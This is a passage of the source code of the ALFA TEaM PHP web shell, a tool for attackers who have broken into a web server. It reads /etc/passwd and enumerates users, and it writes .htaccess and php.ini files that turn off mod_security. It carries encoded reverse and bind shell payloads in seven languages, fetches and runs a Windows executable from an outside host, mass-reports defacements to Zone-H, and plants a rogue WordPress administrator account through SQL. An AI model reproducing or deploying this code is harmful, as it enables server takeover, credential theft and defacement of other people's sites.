4578. if (!_alfa_file_exists("/etc/virtual/domainowners"))
4579. {
4580. echo __pre();
4581. $i = 0;
4582. while ($i < 60000)
4583. {
4584. $line = @posix_getpwuid($i);
4585. if (!empty($line))
4586. {
4587. while (list($key, $vl) = each($line))
4588. {
4589. echo $vl . "\n";
4590. break;
4591. }
4592. }
4593. $i++;
4594. }
4595. }
4596. else
4597. {
4598. echo __pre();
4599. $users = _alfa_file("/etc/virtual/domainowners");
4600. foreach ($users as $boz)
4601. {
4602. $user = explode(":", $boz);
4603. echo trim($user[1]) . '<br>';
4604. }
4605. }
4606. }
4607. if (!empty($_POST['alfa4']) && isset($_POST['alfa4']))
4608. {
4609. echo __pre();
4610. if (_alfa_can_runCommand(true, true))
4611. {
4612. echo __read_file("/etc/passwd");
4613. }
4614. elseif (function_exists("posix_getpwuid"))
4615. {
4616. for ($uid = 0;$uid < 60000;$uid++)
4617. {
4618. $ara = @posix_getpwuid($uid);
4619. if (!empty($ara))
4620. {
4621. while (list($key, $val) = each($ara))
4622. {
4623. echo "$val:";
4624. }
4625. echo "\n";
4626. }
4627. }
4628. }
4629. else
4630. {
4631. __alert('failed...');
4632. }
4633. }
4634. if (!empty($_POST['alfa2']) && isset($_POST['alfa2']))
4635. {
4636. @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4637. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4638. }
4639. if (!empty($_POST['alfa1']) && isset($_POST['alfa1']))
4640. {
4641. @__write_file($GLOBALS['cwd'] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4642. echo '<center><b><big> php.ini created...!</center></b></big>';
4643. }
4644. if (!empty($_POST['alfa3']) && isset($_POST['alfa3']))
4645. {
4646. @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4647. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4648. }
4649. echo "<br></div>";
4650. alfafooter();
4651. }
4652. function __get_resource($content)
4653. {
4654. return @gzinflate(__ZGVjb2Rlcg($content));
4655. }
4656. function __write_file($file, $content)
4657. {
4658. if ($fh = @fopen($file, "wb"))
4659. {
4660. if (fwrite($fh, $content) !== false) return true;
4661. }
4662. return false;
4663. }
4664. function bcinit($evalType, $evalCode, $evalOptions, $evalArguments)
4665. {
4666. $res = "<font color='green'>[ Success...! ]</font>";
4667. $err = "<font color='red'>[ Failed...! ]</font>";
4668. if ($evalOptions != "") $evalOptions = $evalOptions . " ";
4669. if ($evalArguments != "") $evalArguments = " " . $evalArguments;
4670. if ($evalType == "c")
4671. {
4672. $tmpdir = ALFA_TEMPDIR;
4673. chdir($tmpdir);
4674. if (is_writable($tmpdir))
4675. {
4676. $uniq = substr(md5(time()) , 0, 8);
4677. $filename = $evalType . $uniq . ".c";
4678. $path = $filename;
4679. if (__write_file($path, $evalCode))
4680. {
4681. $ext = ($GLOBALS['sys'] == 'win') ? ".exe" : ".out";
4682. $pathres = $filename . $ext;
4683. $evalOptions = "-o " . $pathres . " " . $evalOptions;
4684. $cmd = "gcc " . $evalOptions . $path;
4685. alfaEx($cmd);
4686. if (is_file($pathres))
4687. {
4688. if (chmod($pathres, 0755))
4689. {
4690. $cmd = $pathres . $evalArguments;
4691. alfaEx($cmd);
4692. }
4693. else
4694. {
4695. $res = $err;
4696. }
4697. unlink($pathres);
4698. }
4699. else
4700. {
4701. $res = $err;
4702. }
4703. unlink($path);
4704. }
4705. else
4706. {
4707. $res = $err;
4708. }
4709. }
4710. return $res;
4711. }
4712. elseif ($evalType == "java")
4713. {
4714. $tmpdir = ALFA_TEMPDIR;
4715. chdir($tmpdir);
4716. if (is_writable($tmpdir))
4717. {
4718. if (preg_match("/class\ ([^{]+){/i", $evalCode, $r))
4719. {
4720. $classname = trim($r[1]);
4721. $filename = $classname;
4722. }
4723. else
4724. {
4725. $uniq = substr(md5(time()) , 0, 8);
4726. $filename = $evalType . $uniq;
4727. $evalCode = "class " . $filename . " { " . $evalCode . " } ";
4728. }
4729. $path = $filename . ".java";
4730. if (__write_file($path, $evalCode))
4731. {
4732. $cmd = "javac " . $evalOptions . $path;
4733. alfaEx($cmd);
4734. $pathres = $filename . ".class";
4735. if (is_file($pathres))
4736. {
4737. if (chmod($pathres, 0755))
4738. {
4739. $cmd = "java " . $filename . $evalArguments;
4740. alfaEx($cmd);
4741. }
4742. else
4743. {
4744. $res = $err;
4745. }
4746. unlink($pathres);
4747. }
4748. else
4749. {
4750. $res = $err;
4751. }
4752. unlink($path);
4753. }
4754. else
4755. {
4756. $res = $err;
4757. }
4758. }
4759. return $res;
4760. }
4761. return false;
4762. }
4763. function alfaconnect()
4764. {
4765. alfahead();
4766. $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4767. $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4768. $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4769. $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4770. $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4771. $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4772. $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4773. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4774. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4775. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4776. $cbArr = array(
4777. "php" => "Php",
4778. "perl" => "Perl",
4779. "python" => "Python",
4780. "ruby" => "Ruby",
4781. "c" => "C",
4782. "java" => "Java",
4783. "node" => "NodeJs",
4784. "bcwin" => "Windows"
4785. );
4786. foreach ($cbArr as $key => $val)
4787. {
4788. echo ("<option value='{$key}' " . ($GLOBALS['sys'] == 'win' ? 'selected' : '') . ">{$val}</option>");
4789. }
4790. echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4791. if (isset($_POST['alfa1']) && !empty($_POST['alfa1']))
4792. {
4793. $lang = $_POST['alfa1'];
4794. $ip = $_POST['alfa2'];
4795. $port = $_POST['alfa3'];
4796. $arg = ($_POST['alfa4'] == 'bind' ? $port : $port . ' ' . $ip);
4797. $tmpdir = ALFA_TEMPDIR;
4798. $name = $tmpdir . '/' . $lang . uniqid() . rand(1, 99999);
4799. $allow = array(
4800. 'perl',
4801. 'ruby',
4802. 'python',
4803. 'node'
4804. );
4805. eval('$lan=$' . $lang . ';');
4806. if (in_array($lang, $allow))
4807. {
4808. if (__write_file($name, __get_resource($lan)))
4809. {
4810. if (_alfa_can_runCommand(true, true))
4811. {
4812. $os = ($GLOBALS['sys'] != 'win') ? '1>/dev/null 2>&1 &' : '';
4813. $out = alfaEx("$lang $name $arg $os");
4814. if ($out == '')
4815. {
4816. $out = "<font color='green'><center>[ Finished...! ]</center></font>";
4817. }
4818. echo ("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4819. }
4820. }
4821. else
4822. {
4823. echo ("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4824. }
4825. }
4826. if ($lang == 'java' || $lang == 'c')
4827. {
4828. $code = __get_resource($lan);
4829. $out = nl2br(bcinit($lang, $code, '', ''));
4830. echo ("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4831. }
4832. if ($lang == 'bcwin')
4833. {
4834. $alfa = new AlfaCURL();
4835. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4836. $tmpdir = ALFA_TEMPDIR;
4837. $f = @fopen($tmpdir . '/bcwin.exe', 'w+');
4838. @fwrite($f, $s);
4839. @fclose($f);
4840. $out = alfaEx($tmpdir . "/bcwin.exe " . $_POST['alfa2'] . " " . $_POST['alfa3']);
4841. }
4842. if ($lang == 'php')
4843. {
4844. echo "<pre class=ml1 style='margin-top:5px'>";
4845. $code = __get_resource($lan);
4846. if ($code !== false)
4847. {
4848. $code = "\$target = \"" . $arg . "\";\n" . $code;
4849. eval($code);
4850. echo ("<center><font color='green'>[ Finished...! ]</font></center>");
4851. }
4852. echo "</pre>";
4853. }
4854. }
4855. echo "</div>";
4856. alfafooter();
4857. }
4858. function alfazoneh()
4859. {
4860. alfahead();
4861. echo '<div class=header>';
4862. if (!function_exists('curl_version'))
4863. {
4864. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4865. }
4866. $hackmode = array(
4867. 'known vulnerability (i.e. unpatched system)',
4868. 'undisclosed (new) vulnerability',
4869. 'configuration / admin. mistake',
4870. 'brute force attack',
4871. 'social engineering',
4872. 'Web Server intrusion',
4873. 'Web Server external module intrusion',
4874. 'Mail Server intrusion',
4875. 'FTP Server intrusion',
4876. 'SSH Server intrusion',
4877. 'Telnet Server intrusion',
4878. 'RPC Server intrusion',
4879. 'Shares misconfiguration',
4880. 'Other Server intrusion',
4881. 'SQL Injection',
4882. 'URL Poisoning',
4883. 'File Inclusion',
4884. 'Other Web Application bug',
4885. 'Remote administrative panel access bruteforcing',
4886. 'Remote administrative panel access password guessing',
4887. 'Remote administrative panel access social engineering',
4888. 'Attack against administrator(password stealing/sniffing)',
4889. 'Access credentials through Man In the Middle attack',
4890. 'Remote service password guessing',
4891. 'Remote service password bruteforce',
4892. 'Rerouting after attacking the Firewall',
4893. 'Rerouting after attacking the Router',
4894. 'DNS attack through social engineering',
4895. 'DNS attack through cache poisoning',
4896. 'Not available',
4897. 'Cross-Site Scripting'
4898. );
4899. $reason = array(
4900. 'Heh...just for fun!',
4901. 'Revenge against that website',
4902. 'Political reasons',
4903. 'As a challenge',
4904. 'I just want to be the best defacer',
4905. 'Patriotism',
4906. 'Not available'
4907. );
4908. echo '
4909. <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4910. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4911. <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4912. <br>
4913. <select id="text" name="hackmode" style="width:400px;">';
4914. $x = 1;
4915. foreach ($hackmode as $mode)
4916. {
4917. echo ('<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>');
4918. $x++;
4919. }
4920. echo '</select><br><select id="text" name="reason" style="width:200px;">';
4921. $x = 1;
4922. foreach ($reason as $mode)
4923. {
4924. echo ('<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>');
4925. $x++;
4926. }
4927. echo '</select><br>
4928. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4929. <p><input type="submit" value=" " name="go" /></p>
4930. </form></center>';
4931. if ($_POST['alfa5'] && $_POST['alfa5'] == '>>')
4932. {
4933. ob_start();
4934. $hacker = $_POST['alfa1'];
4935. $method = $_POST['alfa2'];
4936. $neden = $_POST['alfa3'];
4937. $site = $_POST['alfa4'];
4938. if (empty($hacker))
4939. {
4940. die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4941. }
4942. elseif ($method == "------------------------------------SELECT-------------------------------------")
4943. {
4944. die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4945. }
4946. elseif ($neden == "------------------------------------SELECT-------------------------------------")
4947. {
4948. die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4949. }
4950. elseif (empty($site))
4951. {
4952. die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4953. }
4954. $i = 0;
4955. $sites = explode("\n", $site);
4956. $alfa = new AlfaCURL();
4957. while ($i < count($sites))
4958. {
4959. if (substr($sites[$i], 0, 4) != "http")
4960. {
4961. $sites[$i] = "http://" . $sites[$i];
4962. }
4963. $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden);
4964. ++$i;
4965. }
4966. echo __pre() . "<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4967. }
4968. echo "</div>";
4969. alfafooter();
4970. }
4971. function alfapwchanger()
4972. {
4973. alfahead();
4974. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4975. <center><h3>';
4976. $vals = array(
4977. 'WordPress' => array(
4978. 'wp',
4979. 2
4980. ) ,
4981. 'Joomla' => array(
4982. 'joomla',
4983. 3
4984. ) ,
4985. 'vBulletin' => array(
4986. 'vb',
4987. 5
4988. ) ,
4989. 'phpBB' => array(
4990. 'phpbb',
4991. 6
4992. ) ,
4993. 'WHMCS' => array(
4994. 'whmcs',
4995. 7
4996. ) ,
4997. 'MyBB' => array(
4998. 'mybb',
4999. 8
5000. ) ,
5001. 'Php Nuke' => array(
5002. 'nuke',
5003. 9
5004. ) ,
5005. 'Drupal' => array(
5006. 'drupal',
5007. 10
5008. ) ,
5009. 'SMF' => array(
5010. 'smf',
5011. 11
5012. )
5013. );
5014. Alfa_Create_A_Tag('pwchanger', $vals);
5015. echo '</h3></center>';
5016. if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp')
5017. {
5018. echo __pre() . '<center><center><div class="txtfont_header">| WordPress |</div>
5019. <p>' . getConfigHtml('wp') . '</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
5020. $table = array(
5021. 'td1' => array(
5022. 'color' => 'FFFFFF',
5023. 'tdName' => 'Mysql Host',
5024. 'id' => 'db_host',
5025. 'inputName' => 'localhost',
5026. 'inputValue' => 'localhost',
5027. 'inputSize' => '50'
5028. ) ,
5029. 'td2' => array(
5030. 'color' => 'FFFFFF',
5031. 'tdName' => 'Db Name',
5032. 'id' => 'db_name',
5033. 'inputName' => 'database',
5034. 'inputValue' => '',
5035. 'inputSize' => '50'
5036. ) ,
5037. 'td3' => array(
5038. 'color' => 'FFFFFF',
5039. 'tdName' => 'Db User',
5040. 'id' => 'db_user',
5041. 'inputName' => 'username',
5042. 'inputValue' => '',
5043. 'inputSize' => '50'
5044. ) ,
5045. 'td4' => array(
5046. 'color' => 'FFFFFF',
5047. 'tdName' => 'Db Pass',
5048. 'id' => 'db_pw',
5049. 'inputName' => 'password',
5050. 'inputValue' => '',
5051. 'inputSize' => '50'
5052. ) ,
5053. 'td5' => array(
5054. 'color' => 'FFFFFF',
5055. 'tdName' => 'Table Prefix',
5056. 'id' => 'db_prefix',
5057. 'inputName' => 'prefix',
5058. 'inputValue' => 'wp_',
5059. 'inputSize' => '50'
5060. ) ,
5061. 'td6' => array(
5062. 'color' => 'FF0000',
5063. 'tdName' => 'Admin User',
5064. 'inputName' => 'admin',
5065. 'inputValue' => 'admin',
5066. 'inputSize' => '50'
5067. ) ,
5068. 'td7' => array(
5069. 'color' => 'FF0000',
5070. 'tdName' => 'Admin Pass',
5071. 'inputName' => 'kh',
5072. 'inputValue' => 'solevisible',
5073. 'inputSize' => '50',
5074. 'disabled' => true
5075. ) ,
5076. 'td8' => array(
5077. 'color' => 'FF0000',
5078. 'tdName' => 'Admin Email',
5079. 'inputName' => 'email',
5080. 'inputValue' => 'solevisible@fbi.gov',
5081. 'inputSize' => '50'
5082. )
5083. );
5084. create_table($table);
5085. echo '<p><input value=" " name="send" type="submit"></p></form>';
5086. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>')
5087. {
5088. $localhost = $_POST['alfa3'];
5089. $database = $_POST['alfa4'];
5090. $username = $_POST['alfa5'];
5091. $password = $_POST['alfa6'];
5092. $admin = $_POST['alfa8'];
5093. $SQL = $_POST['alfa9'];
5094. $prefix = $_POST['alfa10'];
5095. $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
5096. $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
5097. $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn));
5098. $sole = @mysqli_num_rows($solevisible);
5099. if ($sole == 1)
5100. {
5101. $solevis = @mysqli_fetch_assoc($solevisible);
5102. $res = $solevis['ID'];
5103. }
5104. $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
5105. if ($solevisible)
5106. {
5107. __alert('Success... ' . $admin . ' is created...');
5108. }
5109. }
5110. }
5111. if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla')
5112. {
5113. echo __pre() . '<center><center><div class="txtfont_header">| Joomla |</div><p><p>' . getConfigHtml('joomla') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
5114. $table = array(
5115. 'td1' => array(
5116. 'color' => 'FFFFFF',
5117. 'tdName' => 'Mysql Host',
5118. 'id' => 'db_host',
5119. 'inputName' => 'localhost',
5120. 'inputValue' => 'localhost',
5121. 'inputSize' => '50'
5122. ) ,
5123. 'td2' => array(
5124. 'color' => 'FFFFFF',
5125. 'tdName' => 'Db Name',
5126. 'id' => 'db_name',
5127. 'inputName' => 'database',
5128. 'inputValue' => '',
